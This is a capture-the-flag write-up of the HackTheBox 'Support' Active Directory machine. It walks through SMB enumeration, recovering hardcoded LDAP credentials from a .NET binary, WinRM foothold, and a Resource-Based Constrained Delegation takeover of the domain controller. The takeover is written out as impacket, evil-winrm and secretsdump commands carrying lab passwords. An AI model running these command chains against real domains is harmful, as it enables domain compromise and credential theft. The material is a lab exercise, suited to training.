Support is an easy rated AD machine from HackTheBox. It involves enumerating SMB share and reversing .Net binary to find hardcoded credentials. Then, enumerating LDAP to find password for another user and getting foothold. Finally, having the GenericAll access on DC, performing Resource Based Constrained Delegation (RBCD) to impersonate as Administrator.
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-12-16 12:48:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49700/tcp open msrpc Microsoft Windows RPC
57147/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-12-16T12:49:23
|_ start_date: N/APort 445/139 (SMB)
Checking for null authentication on SMB, we can list shares
We can access support-tools share. It contains some windows binaries. Download everything in our machine.
UserInfo looks interesting. Unzipping it, we get some DLLs. It is Dotnet binary.
Reversing UserInfo.exe
Opening the binary using dnSpy, we can find a username ldap hardcoded in the function. Password is returned from getPassword method from protected class.
Looking at the getpassword method, it’s doing some sort of decryption on encrypted password.
On reversing this function and executing it, we get the password for ldap user.
LDAP Enumeration
Having credentials, we can dump user details from LDAP using ldapsearch. Looking at the user information, we can see an extra attribute with the support user which kinda looks like a password.
ldapsearch -x -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=support,DC=htb"
Trying the found credentials, we successfully get a hit on winrm.
crackmapexec winrm -u support -p 'Ironside47pleasure40Watchful' -d support.htb 10.10.11.174
Using evil-winrm, we get remote powershell session as support user.
evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i 10.10.11.174
Privilege Escalation
Using bloodhound python, we perform domain enumeration.
bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c all
zip data *.json
Opening the collected data in bloodhound and looking at the support user, it has GenericAll access on the DC.
Kerberos Resource-based Constrained Delegation
Article mention in the reference provides full details of this privilege and it’s abuse info. Following guide mentions the steps to exploit this privilege using impacket scripts.
First, create a new computer object in the domain.
impacket-addcomputer -computer-name 'UWU$' -computer-pass ev1lP@sS -dc-ip 10.10.11.174 support.htb/support:Ironside47pleasure40Watchful
Add the related security descriptor of the newly created computer object to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.
# Download rbcd.py
wget https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py && chmod +x ./rbcd.py
# Assign Privilge and Security discriptor
./rbcd.py -f UWU -t DC -dc-ip 10.10.11.174 support.htb\\support:Ironside47pleasure40Watchful
Then, request the impersonated service ticket on behalf of Administrator for DC
impacket-getST -spn cifs/dc.support.htb -impersonate Administrator -dc-ip 10.10.11.174 support/UWU$:ev1lP@sS
Lastly, assign the variable KRB5CCNAME to the path of saved service ticket and using the psexec with kerberos authentication, we get
export KRB5CCNAME=Administrator.ccache
impacket-psexec dc.support.htb -k -no-pass -dc-ip 10.10.11.174
Now, using the secretsdump from impacket, we can dump hashes of users from machine.
Now using evil-winrm, we can get powershell remote session as Administrator user by passing the hash.
Thanks.
References
- LDAP Enum: https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap
- Kerberos Resource-based Constrained Delegation: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution
- RBDC Exploit: https://hakin9.org/rbcd-attack-kerberos-resource-based-constrained-delegation-attack-from-outside-using-impacket/
